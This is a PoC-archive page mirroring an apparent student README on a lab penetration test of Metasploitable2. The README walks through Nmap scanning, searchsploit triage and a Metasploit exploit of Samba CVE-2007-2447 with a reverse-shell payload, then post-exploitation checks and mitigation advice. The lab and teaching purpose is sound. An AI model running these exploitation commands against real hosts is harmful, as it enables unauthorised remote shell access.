Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2007-2447 PoC — Samba MS-RPC Shell命令注入漏洞

Source
https://github.com/SeifEldienAhmad/Penetration-Testing-on-Metasploitable2
Associated Vulnerability
Title:Samba MS-RPC Shell命令注入漏洞 (CVE-2007-2447)
Description:The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Description
Hands-on pentest project using Kali Linux vs Metasploitable2. Includes full workflow: Nmap scanning, enumeration, Metasploit exploitation (Samba CVE-2007-2447), post-exploitation validation, and mitigation steps. Repo contains commands, outputs, and report showing both offensive techniques and defensive recommendations.
Readme
**Internship Project 2 — Penetration Testing on Metasploitable2**

- Summary:
This project demonstrates a complete penetration testing workflow: reconnaissance, enumeration, exploitation, post-exploitation validation, and mitigation recommendations. The target used is Metasploitable2 and the attack box is Kali Linux.

- Tools:
*Kali Linux (attacker)*
*Nmap (recon)*
*Metasploit Framework (exploitation)*
*SearchSploit / Exploit-DB (triage)*

Steps performed:
1. Scanning:
   `sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x`
   Identified services (examples): vsftpd 2.3.4 (port 21 banner), Samba smbd 3.x (port 445).
2. Enumeration & Triage:
   `searchsploit --nmap scans/target.xml
    searchsploit samba 3.0.20`
   Matched services to potential exploits (vsftpd backdoor, Samba username-map).
3. Exploitation

  - vsftpd backdoor (CVE-2011-2523) attempted — Nmap banner present but service unresponsive; exploit did not create a session.
  - Samba (CVE-2007-2447) exploited successfully:
    `msfconsole
    use exploit/multi/samba/usermap_script
    set RHOSTS 192.168.x.x
    set payload cmd/unix/reverse
    set LHOST <kali-ip>
    set LPORT 4444
    exploit
    `
    Obtained interactive shell and validated user context.
4. Post-Exploitation

  - Verified system info:
    `
    id
    uname -a
    `
  - Collected evidence and screenshots.
5. Mitigation Recommendations

  - Regular scanning and asset inventory.
  - Prompt patching and version upgrades (update Samba).
  - Restrict access to critical ports (firewall rules).
  - Disable unused services and anonymous access.
  - Apply least privilege to shares and accounts.
  - Network segmentation and logging/monitoring.
  - Incident response planning.

**Result**
Successfully obtained a remote shell via a Samba exploit, documented the attack path, and produced a mitigation plan. Full logs and command outputs are stored in the scans/ folder.
File Snapshot

 [4.0K]  /data/pocs/b5a12ac946bc5ce89aa02a36c28592915c448128
├── [1.1K]  LICENSE
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →